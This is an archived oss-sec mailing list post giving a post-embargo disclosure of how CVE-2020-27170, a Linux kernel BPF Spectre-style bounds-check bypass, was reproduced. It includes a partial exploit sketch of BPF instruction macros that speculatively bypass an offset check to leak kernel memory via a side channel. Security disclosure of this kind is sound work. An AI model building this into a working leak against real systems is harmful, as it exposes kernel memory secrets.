oss-sec mailing list archives
Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory
From: Piotr Krysiuk <piotras () gmail com>
Date: Wed, 24 Mar 2021 19:34:50 +0000
Some details of how CVE-2020-27170 could be exploited in practice were provided via linux-distros mailing list with 7 days embargo. This was intended to help any affected Linux distributions to assess the risk and decide about any appropriate actions. As the embargo expires today, I was asked to share these details publically on oss-security. The CVE-2020-27170 vulnerability has been successfully reproduced against Linux kernel v5.12-rc3 using the following logic for BPF program attached to a socket: load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX, load pointer to our big array into BPF_REG_MAP_PTR, load offset of data to leak into BPF_REG_OFFSET, // load any slowly-loaded value... BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200), // ... and turn it into known zero for verifier, // while preserving slowly-loaded dependency for affected hardware BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1), BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2), // speculatively bypassed offset check BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK, skip_speculation), // speculatively unbounded pointer arithmetic BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET), // speculatively unbounded load BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX, offsetof(struct __sk_buff, protocol)), transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel, The full reproducers were shared with a number of Linux distributions for protection purposes.
Current thread:
- [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 18)
- Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory Piotr Krysiuk (Mar 24)